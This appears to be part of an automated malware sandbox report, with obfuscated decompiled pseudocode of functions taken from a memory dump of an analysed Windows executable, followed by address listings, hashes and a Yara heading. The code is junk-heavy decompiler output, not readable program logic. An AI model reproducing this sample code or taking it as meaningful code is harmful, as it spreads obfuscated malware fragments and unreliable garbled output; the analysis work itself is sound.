					_pop(__edx);
					__esi =  *0x9ef52769 * 0xc8aa;
					 *0x52852a09 =  *0x52852a09 | __edx;
					asm("sbb [0xd371aa1], ebx");
					asm("adc [0xe91b5164], esi");
					asm("adc edi, [0xe2e36d05]");
					_t21 = __esp;
					__esp =  *0x6505d799;
					 *0x6505d799 = _t21;
					__esp = 0xd791c9c5;
					asm("sbb eax, 0x1fd8905");
					asm("stosb");
					 *0x822d05d7 =  *0x822d05d7 << 0x41;
					asm("cmpsw");
					 *0x905d796 =  *0x905d796 & 0xd791c9c5;
					_push( *0xd798ab8d);
					asm("adc edi, [0xf7fc7505]");
					asm("rcr byte [0xdc03d7a8], 0x5d");
					__edi = __edi +  *0x62041c07;
					asm("rcr byte [0x48e8ef9], 0x7d");
					__ecx = __ecx & 0x8e91906e;
					__dl = __dl +  *0x9baae404;
					asm("adc [0xab93048e], ebp");
					__edi = __edi |  *0x12058e99;
					asm("ror dword [0xd7a4e4cd], 0xd2");
					 *0xfbede605 =  *0xfbede605 & __ebx;
					asm("stosb");
					 *0xeb4b05d7 =  *0xeb4b05d7 << 0x9c;
					asm("sbb [0xc5a2b12], ah");
					asm("movsb");
					 *0x400751b3 =  *0x400751b3 ^ __al;
					asm("sbb ecx, 0xb137986c");
					 *0xa30751b5 =  *0xa30751b5 << 0x51;
					asm("ror dword [0xb74ddb35], 0xe");
					asm("adc ah, [0x2e0751b7]");
					asm("sbb [0x7ac667d8], edx");
					asm("ror dword [0xaa0851bf], 0xd9");
					_pop(__ebp);
					if(__bl != 0x10) {
						 *0x98aed3dc =  *0x98aed3dc >> 0xbb;
						 *0x1a08741e =  *0x1a08741e << 0xca;
						__ecx = __ecx - 1;
						__esi = __esi - 1;
						asm("ror byte [0xb6b70c6], 0xa1");
						if(__esi != 0) {
							 *0xb1f40874 =  *0xb1f40874 ^ __ebx;
							__esi = 0xa4cafdf4;
							asm("sbb ah, [0xf7097422]");
							asm("adc esp, 0x5fbec81d");
							 *0xb6a1e809 =  *0xb6a1e809 & __ebx;
							asm("cmpsw");
							asm("rol dword [0xd6078d21], 0xe8");
							_pop(__edi);
							_t28 = __ebx;
							__ebx =  *0xf46f3009;
							 *0xf46f3009 = _t28;
							 *0xe665d20a = __bh;
							__esp = 0xd791c9c5 +  *0xc00a5fc5;
							_push( *0xea34bb23);
							__ecx =  *0xac2c1e81;
							_pop(__ecx);
							_pop(__ebx);
							__eax = __eax -  *0x7b943727;
							 *0x8303c85 =  *0x8303c85 << 0xba;
							if( *0xa5e3d7f2 != __bl) {
								 *0x740a6974 =  *0x740a6974 ^ 0xa4cafdf4;
								asm("sbb edx, [0x92933c11]");
								asm("ror dword [0x5c27cd2d], 0x58");
								__ebx = __ebx + 0x3cc601ee;
								__esi = 0xa4cafdf4 |  *0xbd74bd16;
								asm("adc eax, [0xd41404b9]");
								__esp = __esp -  *0x9adc0187;
								__bl = __bl - 0x8a;
								__eax = __eax &  *0x494c3d3b;
								if(__eax > 0) {
									__edi = __edi + 1;
									_push( *0x6655596c);
									__ecx = __ecx + 1;
									__ebx = __ebx - 1;
									__edi = 0xe60f97b8;
									__ecx = __ecx &  *0x3abfd66c;
									_pop(__ebx);
									asm("movsw");
									 *0xd184c7ed =  *0xd184c7ed << 0x9c;
									 *0xb3aebf0 =  *0xb3aebf0 << 0x5b;
									 *0x54aaa3e2 = __bh;
									__ch = __ch ^ 0x000000e4;
									__esi = __esi &  *0x47063029;
									 *0xe3f435bd =  *0xe3f435bd - __ebx;
									if( *0xe3f435bd > 0) {
										 *0x46b70c76 = __eax;
										asm("adc [0x89bf189a], edi");
										 *0xba521c32 =  *0xba521c32 << 0x3b;
										L1();
										 *0xb107d7e8 =  *0xb107d7e8 << 0x6c;
										__ebx = __ebx &  *0xfb4e0767;
										__esp = __esp -  *0xe61651f8;
										__eax = __eax - 1;
										__esi = __esi ^  *0x5cdd1fcd;
										__ecx =  *0x22fbdd6a * 0x1d31;
										if(__ecx < 0) {
											asm("ror dword [0x88199173], 0x2");
											__ebx = __ebx + 1;
											 *0x74d446a9 =  *0x74d446a9 << 0x4e;
											 *0x8dcc11ba =  *0x8dcc11ba ^ 0xa4cafdf4;
											 *0xa02ab0b4 =  *0xa02ab0b4 >> 0xdf;
											if(0xa4cafdf4 >=  *0xcaff432b) {
												asm("sbb [0xa5fdd470], ebx");
												 *0xf76fc268 =  *0xf76fc268 & __eax;
												__bl = __bl ^ 0x000000a2;
												__cl = __cl +  *0x3ef9c028;
												 *0x79e11a2a =  *0x79e11a2a >> 0x18;
												asm("lodsb");
												asm("rcr byte [0x9e825614], 0xe7");
												 *0x7275833e =  *0x7275833e | __ecx;
												_t37 = __dl;
												__dl =  *0xec3cd02c;
												 *0xec3cd02c = _t37;
												asm("adc ebx, 0x3456cb17");
												 *0x56479bc6 =  *0x56479bc6 << 0x2c;
												_pop(__esi);
												if(( *0x8422d4f5 & 0xd791c9c5) < 0) {
													__edx =  *0x29ce17d * 0xd97c;
													__edi =  *0x2dd6341e;
													 *0x2dd6341e = 0xe60f97b8;
													asm("ror dword [0xb53983dd], 0x3f");
													asm("rol dword [0xefb51db8], 0x14");
													_push(__ebp);
													__al = __al ^ 0x000000a0;
													__edi =  *0x2dd6341e + 1;
													__ecx =  *0x10bc3b15;
													if(__edi < 0) {
														__esp =  *0x250b57d * 0x71ee;
														_push(__edi);
														 *0x6d2b1614 =  *0x6d2b1614 + __dh;
														if( *0xbe5844eb < __eax) {
															_push(__ebx);
															__eax = __eax + 1;
															asm("sbb [0x57dd3fdd], edx");
															__ebx = 0xdefc78d4;
															__eax = __eax + 1;
															 *0x65dec5e1 =  *0x65dec5e1 ^ __ah;
															__ebx = 0xffffffffdefc78d3;
															_t43 = __eax;
															__eax =  *0x7497e5fe;
															 *0x7497e5fe = _t43;
															if(__dl <=  *0x1645e86) {
																__ecx = 0xebdc9e77;
																__eax = __eax - 1;
																 *0x3a143734 =  *0x3a143734 | __cl;
																__bl = __bl & 0x000000b2;
																asm("adc esi, [0x1345a181]");
																_push(__edx);
																 *0x38950a29 =  *0x38950a29 - __edi;
																_push( *0x38bf0911);
																asm("sbb eax, [0x71d30129]");
																__esp = __esp -  *0xd21f9f8c;
																_push( *0xed4b4523);
																__edi = __edi + 1;
																__edi = __edi + 1;
																asm("adc esp, [0x3ecba91]");
																__ebx = 0xffffffffe7244350;
																_pop(__esp);
																asm("rol byte [0x5982c7a0], 0xfe");
																_push(__edi);
																asm("rol dword [0xb5121829], 0x6a");
																if(0xdefc78d4 == 0) {
																	__eax = __eax - 1;
																	 *0x566ea81c =  *0x566ea81c - __ch;
																	 *0x3c1dcf28 =  *0x3c1dcf28 - __dl;
																	__bh = 0xe5;
																	asm("rcr byte [0x9e30a586], 0xdf");
																	if( *0x3c1dcf28 < 0) {
																		__eax = __eax & 0x816c9179;
																		__ecx = 0xffffffff8687aeba;
																		__bh = 0x000000e5 ^  *0x78d99ec6;
																		__esi =  *0x8814b73d;
																		_t54 = __esp;
																		__esp =  *0x65841239;
																		 *0x65841239 = _t54;
																		 *0x8bb53308 =  *0x8bb53308 ^ __cl;
																		_t55 = __dh;
																		__dh =  *0xd5e840a;
																		 *0xd5e840a = _t55;
																		if( *0x8bb53308 != 0) {
																			_t56 = __esi;
																			__esi =  *0x3fc0c74;
																			 *0x3fc0c74 = _t56;
																			__esp = __esp + 1;
																			__ecx = 0xffffffff8687aebb;
																			__dh = __dh | 0x00000018;
																			__esi =  *0x9de4b406;
																			__bl =  *0x11d7f22a;
																			__bh = __bh ^ 0x000000f6;
																			asm("rcr byte [0x74a1b62a], 0x55");
																			__cl =  *0x5b814bd2;
																			_push(__edx);
																			asm("movsw");
																			 *0x3a1204c1 =  *0x3a1204c1 << 0x11;
																			asm("ror dword [0xd0f9ffd3], 0x4d");
																			__esi =  *0x9de4b406 |  *0x162e59bb;
																			asm("lodsb");
																			if(( *0x9de4b406 |  *0x162e59bb) < 0) {
																				asm("sbb ecx, [0xa7f0d371]");
																				asm("ror byte [0x3adde3f9], 0xd6");
																				asm("rcr byte [0xc0a51618], 0xa3");
																				asm("sbb cl, 0xc6");
																				 *0x2b3a89a3 =  *0x2b3a89a3 | __eax;
																				 *0xcc82863 =  *0xcc82863 + 0xe5;
																				 *0xc04d321d =  *0xc04d321d ^ __edx;
																				_push(__edi);
																				_push( *0xb7b55c3f);
																				asm("adc [0xdf8d8b3], ah");
																				 *0xe7f2c516 =  *0xe7f2c516 >> 0xaa;
																				asm("sbb esp, 0x18906d83");
																				_push( *0x10435ef3);
																				asm("sbb ebx, [0x7e8102b]");
																				asm("sbb dl, 0x0");
																				if( *0xe7f2c516 >= 0) {
																					__esi =  *0xf6e0f67c * 0x978;
																					asm("sbb ebx, 0x9641c78e");
																					 *0x15d4b796 =  *0x15d4b796 & 0xebdc9e77;
																					 *0xc4cb4610 =  *0xc4cb4610 + __dl;
																					 *0xf6e0f67c * 0x978 - 1 =  *0xf6e0f67c * 0x978 - 1 + 0x6a4e6bcf;
																					__ecx = 0xffffffff8687aebb +  *0xe67dd385;
																					_pop( *0xa40341d);
																					_pop( *0xaca6da13);
																					 *0x5d45f01b =  *0x5d45f01b + __ebp;
																					asm("rcl dword [0xd95848b8], 0xa");
																					__ebp = __ebp |  *0xb626f629;
																					__edi = __edi & 0x8159fd19;
																					__esi =  *0xf6e0f67c * 0x00000978 - 0x00000001 + 0x6a4e6bcf & 0xbba5140f;
																					asm("adc esi, 0xf6cd5abf");
																					if(__esi == 0) {
																						 *0xa4c69b7b =  *0xa4c69b7b ^ __eax;
																						 *0x62b80e3c =  *0x62b80e3c << 0x84;
																						__eax = 0x202d1113;
																						 *0x1002229e =  *0x1002229e & __esi;
																						if(0xdefc78d4 == 0x43fc4c9a) {
																							__ebp = __ebp ^ 0xb658347a;
																							 *0x8159fd19 = 0x202d1113;
																							 *0x60478612 =  *0x60478612 - __dh;
																							__ecx =  *0xdb57ee6a * 0xbabb;
																							__esp =  *0x3d96c760 * 0xf9a7;
																							__bl = __bl -  *0xb3adde3;
																							__edx = __edx ^ 0xdb51ad03;
																							 *0xa30f4562 =  *0xa30f4562 >> 0xe3;
																							 *0x1630341e =  *0x1630341e << 0xe9;
																							 *0x96ae87c9 =  *0x96ae87c9 & __al;
																							 *0xb259403a =  *0xb259403a + __ah;
																							__edx = __edx - 0x7208383d;
																							 *0x3ea18492 =  *0x3ea18492 << 0xf4;
																							 *0x4aec1cfb = 0xdefc78d4;
																							__edi = __edi +  *0x920abadb;
																							__edx =  *0x2951d9cc;
																							__ebx =  *0xa4139abe;
																							 *0xa4139abe = 0xffffffffe7244350;
																							__eax = 0x202d1113 |  *0xb5aa0cb9;
																							if(__edi == 0) {
																								_pop(__esp);
																								asm("sbb ecx, [0xd7f816eb]");
																								__esp = 0x79cf2e0b;
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				while(1) {
					L1:
					 *0x3b97609 =  *0x3b97609 & _t96;
					_t75 = _t75 & 0x000000b2;
					if(_t75 != 0) {
						continue;
					}
					L2:
					_pop(_t83);
					 *0x9b43710d =  *0x9b43710d >> 0x59;
					_t87 = (_t87 & 0xec6820a1) +  *0x8dca0c2b + 1;
					asm("ror dword [0xaa6cd8fc], 0x15");
					 *0x74f8a804 =  *0x74f8a804 & _t67;
					 *0x5b0f1f05 = _t67;
					asm("adc ecx, 0x8c0ee43d");
					 *0x2bfa1939 = _t93;
					 *0xed478613 = _t75 &  *0x3e5484fc & 0x610dd78c;
					_t72 = _t72 ^ 0xb71d1f16 |  *0x951ec62f;
					 *0xfa5521d2 =  *0xfa5521d2 << 0xea;
					_t60 = _t60 + 2 &  *0x10814be3;
					asm("sbb [0xf9062aa2], bl");
					asm("adc bh, [0x41608722]");
					_t96 = 0x7c387416;
					 *0x809b9ef =  *0xed478613;
					asm("adc esp, [0xf6102665]");
					_t75 = _t83;
					 *0x8ebbace3 =  *0x8ebbace3 << 0xae;
					 *0x70a50ad7 =  *0x70a50ad7 - _t75;
					_push(_t83 + 1);
					_t67 =  *0x5b0f1f05 - 0x0000000a ^  *0x906b64d2;
					_t93 =  *0xab99e09;
					 *0xab99e09 =  *0x2bfa1939;
					if(_t67 >= 0) {
						while(1) {
							L1:
							 *0x3b97609 =  *0x3b97609 & _t96;
							_t75 = _t75 & 0x000000b2;
							if(_t75 != 0) {
								continue;
							}
							goto L2;
							do {
								do {
									do {
										goto L1;
									} while (_t75 != 0);
									goto L2;
								} while (_t67 >= 0);
								goto L3;
							} while (_t72 >= 0);
							asm("rol byte [0x4c68f784], 0x8d");
							_pop(_t60);
							 *0x206342b0 =  *0x206342b0 << 0x5c;
							asm("rcr byte [0x4eac7ee7], 0x86");
							_t67 =  *0x91e576a * 0xa901;
							_push(0x2f663016);
							_t75 =  *0x5f48636b * 0x00005555 &  *0x74c95ceb;
							asm("sbb ebx, [0x31369c6e]");
							_t96 = (0x7c387416 &  *0xee2a260f) +  *0x50472a93;
							_t87 = _t87 - 1;
							if(_t87 != 0) {
								continue;
							} else {
								asm("adc esi, [0xcdd02e7a]");
								_t60 = _t60 + 0x347ded17;
								if(0x2f663016 != 0) {
									continue;
								} else {
									 *0x9048b5dd =  *0x9048b5dd >> 0x4e;
									 *0xb06d5ff4 =  *0xb06d5ff4 | _t67;
									 *0x591ac92e =  *0x591ac92e << 0xcc;
									 *0x95d3f14 = _t75;
									asm("lodsb");
									 *0xfd7e63c6 =  *0xfd7e63c6 | _t60;
									 *0xb5e49981 =  *0xb5e49981 + _t87 - 0x520b7c0f;
									asm("sbb [0xe8fcc704], ah");
									return _t60 - 0x8016fbf1;
								}
							}
						}
					}
					L3:
					 *0xb99f09b7 =  *0xb99f09b7 ^ _t67;
					asm("adc eax, [0xf7196c7]");
					 *0x1262affc =  *0x1262affc >> 0xdc;
					_t72 = _t72 -  *0x1c4badca;
					asm("rcr dword [0x92772366], 0x3f");
					_t75 = 0x7c387416;
					asm("rcr dword [0xd5227b61], 0x58");
					_t60 =  *0xfd3b2b3a;
					 *0xfd3b2b3a =  *0x6254f17d * 0x00009f21 |  *0x337b9033;
					L1:
					 *0x3b97609 =  *0x3b97609 & _t96;
					_t75 = _t75 & 0x000000b2;
				}
			}












                                    0x0041d3c4
                                    0x0041d3c4
                                    0x0041d3c4
                                    0x0041d3c4
                                    0x0041d3c4
                                    0x0041d3ca
                                    0x0041d3d1
                                    0x0041d3d7
                                    0x0041d3dd
                                    0x0041d3dd
                                    0x0041d3e3
                                    0x0041d3e9
                                    0x0041d3f5
                                    0x0041d3fb
                                    0x0041d3fb
                                    0x0041d3fb
                                    0x0041d407
                                    0x0041d408
                                    0x0041d409
                                    0x0041d413
                                    0x0041d41f
                                    0x0041d42b
                                    0x0041d431
                                    0x0041d437
                                    0x0041d437
                                    0x0041d437
                                    0x0041d43d
                                    0x0041d442
                                    0x0041d447
                                    0x0041d448
                                    0x0041d44f
                                    0x0041d451
                                    0x0041d457
                                    0x0041d45d
                                    0x0041d463
                                    0x0041d46a
                                    0x0041d470
                                    0x0041d477
                                    0x0041d47d
                                    0x0041d483
                                    0x0041d489
                                    0x0041d48f
                                    0x0041d496
                                    0x0041d49c
                                    0x0041d49d
                                    0x0041d4aa
                                    0x0041d4b0
                                    0x0041d4b1
                                    0x0041d4b7
                                    0x0041d4bd
                                    0x0041d4c4
                                    0x0041d4cb
                                    0x0041d4d1
                                    0x0041d4d7
                                    0x0041d4e4
                                    0x0041d4e8
                                    0x0041d4f4
                                    0x0041d4fb
                                    0x0041d502
                                    0x0041d503
                                    0x0041d504
                                    0x0041d50b
                                    0x0041d511
                                    0x0041d517
                                    0x0041d51d
                                    0x0041d529
                                    0x0041d52f
                                    0x0041d535
                                    0x0041d537
                                    0x0041d53e
                                    0x0041d53f
                                    0x0041d53f
                                    0x0041d53f
                                    0x0041d545
                                    0x0041d54b
                                    0x0041d551
                                    0x0041d557
                                    0x0041d563
                                    0x0041d564
                                    0x0041d565
                                    0x0041d56b
                                    0x0041d578
                                    0x0041d57e
                                    0x0041d584
                                    0x0041d58a
                                    0x0041d591
                                    0x0041d597
                                    0x0041d59d
                                    0x0041d5a3
                                    0x0041d5a9
                                    0x0041d5ac
                                    0x0041d5b2
                                    0x0041d5be
                                    0x0041d5bf
                                    0x0041d5c5
                                    0x0041d5c9
                                    0x0041d5ca
                                    0x0041d5d0
                                    0x0041d5d6
                                    0x0041d5d7
                                    0x0041d5d9
                                    0x0041d5e0
                                    0x0041d5e7
                                    0x0041d5ed
                                    0x0041d5f6
                                    0x0041d5fc
                                    0x0041d602
                                    0x0041d608
                                    0x0041d60d
                                    0x0041d613
                                    0x0041d61a
                                    0x0041d61f
                                    0x0041d626
                                    0x0041d62c
                                    0x0041d632
                                    0x0041d633
                                    0x0041d639
                                    0x0041d643
                                    0x0041d649
                                    0x0041d650
                                    0x0041d651
                                    0x0041d658
                                    0x0041d65e
                                    0x0041d66b
                                    0x0041d671
                                    0x0041d67d
                                    0x0041d683
                                    0x0041d686
                                    0x0041d68c
                                    0x0041d694
                                    0x0041d695
                                    0x0041d69c
                                    0x0041d6a2
                                    0x0041d6a2
                                    0x0041d6a2
                                    0x0041d6ae
                                    0x0041d6ba
                                    0x0041d6c7
                                    0x0041d6c8
                                    0x0041d6ce
                                    0x0041d6d8
                                    0x0041d6d8
                                    0x0041d6de
                                    0x0041d6e5
                                    0x0041d6ec
                                    0x0041d6ed
                                    0x0041d6ef
                                    0x0041d6f0
                                    0x0041d6f6
                                    0x0041d6fc
                                    0x0041d706
                                    0x0041d70a
                                    0x0041d716
                                    0x0041d722
                                    0x0041d729
                                    0x0041d72a
                                    0x0041d730
                                    0x0041d735
                                    0x0041d736
                                    0x0041d73c
                                    0x0041d743
                                    0x0041d743
                                    0x0041d743
                                    0x0041d749
                                    0x0041d74f
                                    0x0041d754
                                    0x0041d755
                                    0x0041d761
                                    0x0041d764
                                    0x0041d76a
                                    0x0041d76b
                                    0x0041d777
                                    0x0041d77d
                                    0x0041d783
                                    0x0041d789
                                    0x0041d79b
                                    0x0041d7a2
                                    0x0041d7a3
                                    0x0041d7a9
                                    0x0041d7af
                                    0x0041d7b0
                                    0x0041d7b7
                                    0x0041d7b8
                                    0x0041d7bf
                                    0x0041d7cb
                                    0x0041d7cc
                                    0x0041d7d2
                                    0x0041d7d8
                                    0x0041d7da
                                    0x0041d7e1
                                    0x0041d7e7
                                    0x0041d7ec
                                    0x0041d7f2
                                    0x0041d7f8
                                    0x0041d7fe
                                    0x0041d7fe
                                    0x0041d7fe
                                    0x0041d804
                                    0x0041d80a
                                    0x0041d80a
                                    0x0041d80a
                                    0x0041d810
                                    0x0041d816
                                    0x0041d816
                                    0x0041d816
                                    0x0041d81c
                                    0x0041d81d
                                    0x0041d81e
                                    0x0041d821
                                    0x0041d827
                                    0x0041d82d
                                    0x0041d830
                                    0x0041d83d
                                    0x0041d843
                                    0x0041d844
                                    0x0041d846
                                    0x0041d84d
                                    0x0041d854
                                    0x0041d85a
                                    0x0041d85b
                                    0x0041d861
                                    0x0041d867
                                    0x0041d86e
                                    0x0041d875
                                    0x0041d878
                                    0x0041d87e
                                    0x0041d884
                                    0x0041d88a
                                    0x0041d88b
                                    0x0041d891
                                    0x0041d897
                                    0x0041d89e
                                    0x0041d8a4
                                    0x0041d8aa
                                    0x0041d8b0
                                    0x0041d8b3
                                    0x0041d8b9
                                    0x0041d8c3
                                    0x0041d8c9
                                    0x0041d8cf
                                    0x0041d8d6
                                    0x0041d8e2
                                    0x0041d8e8
                                    0x0041d8ee
                                    0x0041d8f4
                                    0x0041d8fa
                                    0x0041d901
                                    0x0041d907
                                    0x0041d90d
                                    0x0041d913
                                    0x0041d919
                                    0x0041d91f
                                    0x0041d925
                                    0x0041d92c
                                    0x0041d931
                                    0x0041d93d
                                    0x0041d943
                                    0x0041d949
                                    0x0041d94e
                                    0x0041d954
                                    0x0041d95e
                                    0x0041d968
                                    0x0041d96e
                                    0x0041d974
                                    0x0041d97b
                                    0x0041d982
                                    0x0041d988
                                    0x0041d98e
                                    0x0041d994
                                    0x0041d99b
                                    0x0041d9a1
                                    0x0041d9a7
                                    0x0041d9ad
                                    0x0041d9ad
                                    0x0041d9b3
                                    0x0041d9ba
                                    0x0041d9c6
                                    0x0041d9c7
                                    0x0041d9cd
                                    0x0041d9cd
                                    0x0041d9ba
                                    0x0041d93d
                                    0x0041d919
                                    0x0041d8b3
                                    0x0041d85b
                                    0x0041d810
                                    0x0041d7e1
                                    0x0041d7bf
                                    0x0041d749
                                    0x0041d716
                                    0x0041d6f6
                                    0x0041d6c8
                                    0x0041d66b
                                    0x0041d643
                                    0x0041d602
                                    0x0041d5b2
                                    0x0041d578
                                    0x0041d50b
                                    0x0041d4e8
                                    0x0041cfa6
                                    0x0041cfa6
                                    0x0041cfa6
                                    0x0041cfac
                                    0x0041cfaf
                                    0x00000000
                                    0x00000000
                                    0x0041cfb1
                                    0x0041cfb7
                                    0x0041cfb8
                                    0x0041cfd3
                                    0x0041cfd5
                                    0x0041cfe8
                                    0x0041cfee
                                    0x0041d000
                                    0x0041d006
                                    0x0041d00c
                                    0x0041d012
                                    0x0041d01f
                                    0x0041d026
                                    0x0041d02c
                                    0x0041d047
                                    0x0041d04d
                                    0x0041d053
                                    0x0041d059
                                    0x0041d05f
                                    0x0041d066
                                    0x0041d06d
                                    0x0041d073
                                    0x0041d074
                                    0x0041d07a
                                    0x0041d07a
                                    0x0041d080
                                    0x0041cfa6
                                    0x0041cfa6
                                    0x0041cfa6
                                    0x0041cfac
                                    0x0041cfaf
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0041cfa6
                                    0x0041cfa6
                                    0x0041cfa6
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0041cfa6
                                    0x00000000
                                    0x0041cfa6
                                    0x0041d0f8
                                    0x0041d0ff
                                    0x0041d106
                                    0x0041d10d
                                    0x0041d11a
                                    0x0041d124
                                    0x0041d125
                                    0x0041d12b
                                    0x0041d131
                                    0x0041d137
                                    0x0041d138
                                    0x00000000
                                    0x0041d13e
                                    0x0041d13e
                                    0x0041d144
                                    0x0041d149
                                    0x00000000
                                    0x0041d14f
                                    0x0041d155
                                    0x0041d163
                                    0x0041d169
                                    0x0041d170
                                    0x0041d191
                                    0x0041d192
                                    0x0041d198
                                    0x0041d19e
                                    0x0041d1a9
                                    0x0041d1a9
                                    0x0041d149
                                    0x0041d138
                                    0x0041cfa6
                                    0x0041d086
                                    0x0041d090
                                    0x0041d09c
                                    0x0041d0a9
                                    0x0041d0b6
                                    0x0041d0bc
                                    0x0041d0c3
                                    0x0041d0c4
                                    0x0041d0cb
                                    0x0041d0cb
                                    0x0041cfa6
                                    0x0041cfa6
                                    0x0041cfac
                                    0x0041cfac

                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6c0a262bcd4ea6ca4a2aa97afdbf66d833422cc74f92fba0f3151d65d9c52738
                                    • Instruction ID: ec95f877ae67b03f65726077f90bae4a517d53838de35b86111ee8a24a58eff7
                                    • Opcode Fuzzy Hash: 6c0a262bcd4ea6ca4a2aa97afdbf66d833422cc74f92fba0f3151d65d9c52738
                                    • Instruction Fuzzy Hash: 60124372948791CFDB16CF38D98AB913FB2F392720708424EC5A1975D2D738256ACF89
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041E5F4, Relevance: .3, Instructions: 271COMMONCrypto
                                    Download Yara Rule
                                    C-Code - Quality: 46%
                                    			E0041E5F4(signed char __eax, signed int __ebx, signed int __ecx, signed int __edx, signed int __edi, signed int __esi) {
				void* _v3;
				signed char _t42;
				signed int _t44;
				signed int _t50;
				signed int _t58;
				intOrPtr _t63;
				signed int _t65;
				signed char _t68;
				signed int _t69;
				signed char _t71;
				signed int _t74;
				signed int _t79;
				signed int _t95;
				signed int _t101;
				signed int _t102;

				_t79 = __esi;
				_t74 = __edi;
				_t70 = __edx;
				_t65 = __ecx;
				_t50 = __ebx;
				_t41 = __eax;
				goto L1;
				do {
					do {
						do {
							do {
								do {
									do {
										do {
											do {
												do {
													do {
														do {
															do {
																L1:
																_t41 = _t41 & 0xce083135;
																asm("sbb ebx, 0xfb3676c");
																_t79 = _t79 + 1;
																 *0x834f8af8 =  *0x834f8af8 >> 0x3b;
															} while (( *0xc840cd8c & _t95) <= 0);
															_t95 =  *0xf8c4d47e * 0x9a77;
															asm("rol dword [0x281d2ac8], 1");
															 *0x688255f8 = _t65;
															 *0x5bee4be2 =  *0x5bee4be2 >> 0xb7;
															asm("ror dword [0x80e6cfd6], 0xb3");
															 *0x3bb8a5c0 =  *0x3bb8a5c0 & _t41;
															_t50 = _t50 + 0x00000001 ^  *0x34db4139;
															asm("adc ebp, 0xac18d8db");
															_t65 = _t65 +  *0x6ce69d6d - 1;
															_t70 = _t70 + 1;
															 *0xa74e77eb =  *0xa74e77eb - _t65;
															 *0xf94e2fa =  *0xf94e2fa >> 0x4d;
														} while ( *0xa74e77eb >= 0);
														 *0xd56f2929 = _t79;
														asm("adc dh, [0xc56e361c]");
														asm("adc [0x4cc77868], ebp");
														asm("sbb ah, 0x8");
														asm("rol dword [0x36d03f68], 0x1f");
														_pop(_t41);
														L1();
														 *0xa3feebe8 =  *0xa3feebe8 & _t79;
														asm("rcr byte [0x2ed1bf08], 0x55");
														 *0xc36be062 =  *0xc36be062 & _t74;
														asm("sbb edx, [0xc1b7e79a]");
														asm("sbb [0x9db73b02], bh");
														 *0xee9ab5f2 =  *0xee9ab5f2 | _t65;
														_t50 =  *0x529a8abb &  *0xad498329 ^ 0x000000a8 ^  *0x5ac50894;
														_t79 =  *0xc3cc8423;
														_pop(_t65);
														 *0x27858fbb =  *0x27858fbb & _t50;
														asm("sbb dh, 0x20");
														 *0x84ebfcd5 = 0x7f000973;
													} while ( *0x27858fbb <= 0);
													 *0x47dfe576 =  *0x47dfe576 | _t74;
													_pop(_t79);
													 *0x59abee3 =  *0x59abee3 + _t65;
													_t65 = _t65 +  *0xfc72bf0b;
													_push( *0xffd981b8);
													asm("scasd");
													 *0xbb0d2e66 = _t74;
													asm("adc dh, 0xb7");
													_t50 = _t50 - 1;
													_t95 = _t95 - 0x52d9180b;
												} while ((_t41 & 0x0000001c) != 0);
												 *0x6faf4875 = _t50;
												 *0x9e03d9c6 =  *0x9e03d9c6 ^ _t50;
												asm("movsb");
												asm("adc esp, 0x21dfc73e");
												asm("sbb ebx, [0xa2cc7915]");
												_t65 = (_t65 | 0x7d2e6405) - 0x84;
												asm("movsb");
												_t74 = _t74 &  *0x49f2b4a1;
												 *0x3a325326 =  *0x3a325326 - _t95;
												_t50 = _t50 |  *0x2f719ed3;
												asm("lodsb");
												_t41 = _t41 ^  *0x916a6b2;
											} while (_t41 < 0);
											 *0xa848b78 =  *0xa848b78 + _t74;
											_pop( *0xcfef3c6c);
											asm("adc ebp, [0xf970f9f5]");
											_pop(_t42);
											 *0xb3d28cf9 =  *0xb3d28cf9 >> 0xbb;
											 *0xe01aca1c =  *0xe01aca1c | _t65;
											 *0x750ee711 =  *0x750ee711 + _t65;
											_pop(_t71);
											 *0xb671dcec =  *0xb671dcec << 0xc6;
											 *0x98574e94 =  *0x98574e94 & 0x01c869c2;
											_pop(_t68);
											_push( *0x2f21a91f);
											 *0xbd57bfd8 =  *0xbd57bfd8 << 0x73;
											_t44 = _t42 ^  *0x2540fc2a |  *0x99da1818;
											 *0xb00e43e1 =  *0xb00e43e1 << 0xa2;
											asm("stosd");
											asm("rol byte [0x23cccf32], 0xbd");
											_t74 = _t74 |  *0xba7f26ea;
											 *0xf77a380c =  *0xf77a380c ^ _t71;
											 *0xc8dab9e7 =  *0xc8dab9e7 - _t68;
											_t79 =  *0x606c8f60 * 0x4bdb - 1;
											asm("stosd");
											 *0x7403ca80 =  *0x7403ca80 ^ _t44;
											_t50 =  *0xffe468e +  *0xdb883fc;
											_t41 = _t44 &  *0xceb46c13;
											_t70 = 0x5df4c40f;
											_t65 = _t68 |  *0xf04ead10;
											asm("adc [0x1c0cdfb3], cl");
											 *0xf6f1c7d1 =  *0xf6f1c7d1 - _t74;
											asm("adc esi, 0xdcefb6be");
											asm("sbb edx, [0xae8d3325]");
											asm("sbb [0xf64cbc], esi");
											 *0xf4689886 =  *0xf4689886 | _t41;
											_t95 = _t79;
										} while ( *0xf4689886 < 0);
										_t69 =  *0xaeb0ea7c * 0xf9ce;
										_push(_t69);
										asm("sbb eax, [0xd177021b]");
										 *0xa45846a8 =  *0xa45846a8 ^ _t41;
										_t70 = 0x5df4c40f +  *0x5d680fc5;
										 *0x35e87b1c = _t41;
										_t65 = _t69 & 0x65645917;
										asm("sbb [0xeac7802d], ecx");
										_t50 = _t50 ^  *0x645d04a2;
										 *0xd5c27c6c =  *0xd5c27c6c & _t74;
										_push(_t41);
										_t15 = _t95;
										_t95 =  *0x8aace716;
										 *0x8aace716 = _t15;
										asm("adc [0x282cd3a8], dl");
									} while ( *0xd5c27c6c < 0);
									 *0x741a6870 =  *0x741a6870 ^ _t79;
									_t74 = _t74 + 0xf0f76fa3;
									 *0xb1e62f20 =  *0xb1e62f20 & _t70;
									asm("movsw");
									_t95 = 0x280943c5 &  *0x18ea01ee;
									asm("rcl dword [0x613d0e0e], 0x16");
									asm("rcr dword [0x3abd70ed], 0x18");
									_t58 =  *0x719a3229;
									 *0x719a3229 = _t50 | 0xa6d8cc27;
									 *0x30a39dd7 = _t58;
									 *0x6e8c39b7 =  *0x6e8c39b7 + _t41;
